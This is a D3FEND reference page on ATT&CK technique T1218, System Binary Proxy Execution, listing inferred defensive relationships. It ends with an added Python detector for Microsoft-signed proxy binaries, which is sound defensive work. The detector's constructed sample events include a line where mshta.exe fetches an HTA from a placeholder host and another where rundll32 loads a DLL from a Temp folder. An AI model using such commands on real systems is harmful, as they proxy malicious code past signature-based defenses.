System Binary Proxy Execution - T1218
(ATT&CK® Technique)
Definition
Adversaries may bypass process- and/or signature-based defenses by proxying execution of malicious content through signed, or otherwise trusted, binaries. Binaries used in this technique are often Microsoft-signed files, indicating that they have either been downloaded from Microsoft or are already native to the operating system. Binaries signed with trusted digital certificates can typically execute on Windows systems protected by digital signature validation. Several Microsoft-signed binaries that are present by default on Windows installations can be used to proxy execution of other files or commands.
D3FEND Inferred Relationships
The D3FEND knowledge graph infers the following relationships for this technique.

Artifacts the offensive technique acts on:
T1218 invokes Create Process
T1218 invokes Create Thread
T1218 invokes Create File
T1218 executes Command
T1218 modifies Process Segment
T1218 loads Shared Library File
T1218 interprets Microsoft HTML Application
T1218 may-add Software
T1218 may-modify System Configuration Database
T1218 may-modify System Configuration Database Record
T1218 may-produce Network Traffic

Defensive techniques related through those artifacts (defensive technique, relationship to the artifact, inferred relationship to T1218 in parentheses):

May deceive:
Decoy File spoofs Shared Library File, Microsoft HTML Application (may-deceive)

May detect:
Emulated File Analysis analyzes Microsoft HTML Application (may-detect)
Dynamic Analysis analyzes Microsoft HTML Application (may-detect)
File Analysis analyzes Shared Library File, Microsoft HTML Application (may-detect)
File Integrity Monitoring analyzes Shared Library File, Microsoft HTML Application (may-detect)
File Creation Analysis analyzes Create File (may-detect)
Process Spawn Analysis analyzes Create Process (may-detect)
System Call Analysis analyzes Create Process, Create Thread, Create File (may-detect)
Per Host Download-Upload Ratio Analysis analyzes Network Traffic (may-detect)
Protocol Metadata Anomaly Detection analyzes Network Traffic (may-detect)
Client-server Payload Profiling analyzes Network Traffic (may-detect)
Network Traffic Community Deviation analyzes Network Traffic (may-detect)
Network Traffic Signature Analysis analyzes Network Traffic (may-detect)
Remote Terminal Session Detection analyzes Network Traffic (may-detect)
User Geolocation Logon Pattern Analysis analyzes Network Traffic (may-detect)

May evict:
File Eviction deletes Shared Library File, Microsoft HTML Application (may-evict)

May harden:
File Encryption encrypts Shared Library File, Microsoft HTML Application (may-harden)
System Configuration Permissions restricts System Configuration Database (may-harden)
Software Update updates Software (may-harden)
Process Segment Execution Prevention neutralizes Process Segment (may-harden)
Segment Address Offset Randomization obfuscates Process Segment (may-harden)

May isolate:
Executable Allowlisting filters Create Process (may-isolate)
Executable Denylisting filters Create Process (may-isolate)
Hardware-based Process Isolation restricts Create Process (may-isolate)
System Call Filtering filters Create Process, Create Thread, Create File (may-isolate)
Local File Permissions restricts Shared Library File, Microsoft HTML Application (may-isolate)
Remote File Access Mediation isolates Shared Library File, Microsoft HTML Application (may-isolate)
Network Traffic Filtering filters Network Traffic (may-isolate)

May restore:
Restore Software restores Software (may-restore)
Restore File restores Shared Library File, Microsoft HTML Application (may-restore)
Restore Database restores System Configuration Database (may-restore)
Restore Configuration restores System Configuration Database Record (may-restore)
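The definition above makes the core point: the proxy binary itself passes signature validation, so a defense that only checks signatures sees nothing wrong. The detection relationships the graph infers (Process Spawn Analysis over Create Process, File Creation Analysis over Create File) are where the technique becomes visible. The following is an added example, not code from D3FEND, ATT&CK or Microsoft, of a minimal Process Spawn Analysis over process-creation events whose fields loosely follow Sysmon Event ID 1. Every event in SAMPLE_EVENTS is constructed, and PROXY_BINARIES is an assumed watch-list of Microsoft-signed binaries that interpret an HTA or load a DLL on a caller's behalf; an analyst would tune it for their environment.

```python
"""Process Spawn Analysis for T1218 over constructed process-creation events.

Added example; not code from D3FEND, ATT&CK or Microsoft. Event fields loosely
follow Sysmon Event ID 1 (process creation). All events in SAMPLE_EVENTS are
constructed, and PROXY_BINARIES is an assumed watch-list to be tuned locally.
"""
from dataclasses import dataclass
import ntpath
import re

# Assumption: Microsoft-signed Windows binaries that interpret a Microsoft HTML
# Application (mshta.exe) or load a Shared Library File (rundll32.exe,
# regsvr32.exe) on behalf of whatever invoked them.
PROXY_BINARIES = {"mshta.exe", "rundll32.exe", "regsvr32.exe"}

# Path fragments marking user-writable locations; a system binary proxying a
# payload from one of these is unexpected and worth an alert.
USER_WRITABLE = ("\\users\\", "\\temp\\", "\\appdata\\", "\\programdata\\")

# Child images that show the proxy handed execution on to another interpreter.
SPAWNED_INTERPRETERS = {"powershell.exe", "cmd.exe", "wscript.exe", "cscript.exe"}

URL_RE = re.compile(r"https?://[^\s\"']+", re.IGNORECASE)
PATH_RE = re.compile(r"[A-Za-z]:\\[^\s\"',;]+")


@dataclass(frozen=True)
class ProcessEvent:
    image: str         # full path of the created process
    command_line: str
    parent_image: str  # full path of the creating process
    signed_by: str     # signer reported by the sensor, "" when unsigned


@dataclass(frozen=True)
class Finding:
    rule: str
    image: str   # proxy binary the finding concerns
    detail: str  # payload path, URL or spawned child


def image_name(path: str) -> str:
    return ntpath.basename(path).lower()


def microsoft_signed(event: ProcessEvent) -> bool:
    return "microsoft" in event.signed_by.lower()


def analyze(event: ProcessEvent) -> list[Finding]:
    """Return T1218 findings for one process-creation event."""
    findings = []
    name = image_name(event.image)
    parent = image_name(event.parent_image)

    # Rules 1 and 2 fire only for genuinely Microsoft-signed proxies: the
    # signature check passes, which is exactly why spawn analysis is needed.
    if name in PROXY_BINARIES and microsoft_signed(event):
        for path in PATH_RE.findall(event.command_line):
            if any(seg in path.lower() for seg in USER_WRITABLE):
                findings.append(Finding("proxy-loads-user-writable-payload", name, path))
        for url in URL_RE.findall(event.command_line):
            findings.append(Finding("proxy-fetches-remote-content", name, url))

    # Rule 3: a proxy binary creating an interpreter process (Create Process).
    if parent in PROXY_BINARIES and name in SPAWNED_INTERPRETERS:
        findings.append(Finding("proxy-spawns-interpreter", parent, name))
    return findings


def analyze_log(events) -> list[Finding]:
    return [f for e in events for f in analyze(e)]


# Constructed events; user names, hosts and file names are placeholders.
SAMPLE_EVENTS = [
    # Benign: rundll32 loading a DLL from System32 under explorer (no finding).
    ProcessEvent(r"C:\Windows\System32\rundll32.exe",
                 r"rundll32.exe C:\Windows\System32\shell32.dll,Control_RunDLL",
                 r"C:\Windows\explorer.exe", "Microsoft Windows"),
    # Shared Library File loaded from a user-writable directory.
    ProcessEvent(r"C:\Windows\System32\rundll32.exe",
                 r"rundll32.exe C:\Users\bob\AppData\Local\Temp\upd.dll,Start",
                 r"C:\Windows\explorer.exe", "Microsoft Windows"),
    # Microsoft HTML Application fetched over the network (Network Traffic).
    ProcessEvent(r"C:\Windows\System32\mshta.exe",
                 "mshta.exe http://example.invalid/page.hta",
                 r"C:\Windows\System32\cmd.exe", "Microsoft Windows"),
    # Proxy handing execution on to an interpreter (Create Process).
    ProcessEvent(r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
                 "powershell.exe -NoProfile",
                 r"C:\Windows\System32\mshta.exe", "Microsoft Windows"),
]


def run_sample() -> list[Finding]:
    return analyze_log(SAMPLE_EVENTS)


if __name__ == "__main__":
    for f in run_sample():
        print(f"{f.rule:36} {f.image:14} {f.detail}")
```

The benign first event produces nothing because the payload path is under System32, while the remaining three events each trigger one rule even though every image involved is Microsoft-signed. In production the same logic would read sensor telemetry instead of SAMPLE_EVENTS, and the user-writable path list and interpreter set would be widened to match what the environment actually runs.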